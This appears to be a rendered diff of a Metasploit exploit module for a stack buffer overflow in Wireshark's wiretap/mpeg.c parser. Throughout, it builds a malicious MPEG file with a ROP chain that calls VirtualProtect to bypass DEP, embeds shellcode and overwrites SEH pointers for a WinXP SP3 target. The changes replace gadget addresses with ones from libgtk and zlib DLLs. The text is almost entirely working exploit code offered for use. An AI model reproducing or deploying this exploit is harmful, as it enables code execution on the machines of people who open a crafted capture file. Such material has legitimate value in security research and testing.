@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC ' ,
16
+ 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow' ,
17
17
'Description' => %q{
18
18
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
19
19
by generating an malicious file.)
@@ -48,7 +48,7 @@ def initialize(info = {})
48
48
[ 'WinXP SP3 Spanish (bypass DEP)' ,
49
49
{
50
50
'OffSet' => 70692 ,
51
- 'Ret' => 0x1c077cc3 , # pop/pop/ret -> krb5_32.dll module
51
+ 'Ret' => 0x1c077cc3 , # pop/pop/ret -> "c:\Program Files\Wireshark\ krb5_32.dll" (version: 1.6.3.16)
52
52
'jmpesp' => 0x68e2bfb9 ,
53
53
}
54
54
] ,
@@ -66,28 +66,29 @@ def initialize(info = {})
66
66
def junk
67
67
return rand_text ( 4 ) . unpack ( "L" ) [ 0 ] . to_i
68
68
end
69
+
69
70
def create_rop_chain ( )
70
71
71
72
# rop chain generated with mona.py - www.corelan.be
72
73
rop_gadgets =
73
74
[
74
- 0x78b41ccb , # POP EAX # RETN [MSVCR100. dll]
75
+ 0x61863c2a , # POP EAX # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0]
75
76
0x62d9027c , # ptr to &VirtualProtect() [IAT libcares-2.dll]
76
- 0x61970969 , # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll]
77
- 0x68605980 , # XCHG EAX,ESI # RETN [libglib- 2.0-0.dll]
78
- 0x64f94ba1 , # POP EBP # RETN [libfontconfig-1. dll]
79
- 0x63cd04f1 , # & push esp # ret [liblzma-5. dll]
80
- 0x6d4c331b , # POP EBX # RETN [libpangocairo-1 .0-0.dll]
77
+ 0x61970969 , # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 ]
78
+ 0x61988cf6 , # XCHG EAX,ESI # RETN [libgtk-win32- 2.0-0.dll, ver: 2.24.14.0 ]
79
+ 0x619c0a2a , # POP EBP # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0]
80
+ 0x61841e98 , # & push esp # ret [libgtk-win32-2.0-0. dll, ver: 2.24.14.0 ]
81
+ 0x6191d11a , # POP EBX # RETN [libgtk-win32-2 .0-0.dll, ver: 2.24.14.0]
81
82
0x00000201 , # 0x00000201-> ebx
82
- 0x78aa3bfb , # POP EDX # RETN [MSVCR100 .dll]
83
+ 0x5a4c1414 , # POP EDX # RETN [zlib1 .dll, ver: 1.2.5.0 ]
83
84
0x00000040 , # 0x00000040-> edx
84
- 0x78b29eda , # POP ECX # RETN [MSVCR100. dll]
85
+ 0x6197660f , # POP ECX # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0]
85
86
0x668242b9 , # &Writable location [libgnutls-26.dll]
86
- 0x70f67579 , # POP EDI # RETN [libxml2-2. dll]
87
+ 0x6199b8a5 , # POP EDI # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0
87
88
0x63a528c2 , # RETN (ROP NOP) [libgobject-2.0-0.dll]
88
- 0x6d5f8297 , # POP EAX # RETN [libgio- 2.0-0.dll]
89
+ 0x61863c2a , # POP EAX # RETN [libgtk-win32- 2.0-0.dll, ver: 2.24.14.0 ]
89
90
0x90909090 , # nop
90
- 0x6536979d , # PUSHAD # RETN [libpixman-1-0 .dll]
91
+ 0x6199652d , # PUSHAD # RETN [libgtk-win32-2.0-0 .dll, ver: 2.24.14.0 ]
91
92
] . flatten . pack ( "V*" )
92
93
93
94
return rop_gadgets
@@ -98,14 +99,14 @@ def exploit
98
99
99
100
print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
100
101
magic_header = "\xff \xfb " # mpeg magic_number
101
- packet = pattern_create ( 892 )
102
+ packet = pattern_create ( 892 )
102
103
ropchain = create_rop_chain
103
104
packet << ropchain
104
105
packet << payload . encoded # Shellcode
105
106
packet << pattern_create ( target [ 'OffSet' ] - 892 - ropchain . length - payload . encoded . length )
106
107
# SEH pointers overwrite (nseh & seh)
107
- packet << " \x90 \x90 \x90 \x90 " # nseh
108
- # 0xff is badchar then we can't make a jump back with jmp $-2000
108
+ packet << make_nops ( 4 ) # nseh
109
+ # \ 0xff is a badchar then we can't make a jump back with jmp $-2000
109
110
# After nseh and seh we haven't space, then we have to jump to another location.
110
111
# 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA
111
112
packet << "\x55 \x59 \x80 \x6b " # seh -> ADD ESP,offset # RETN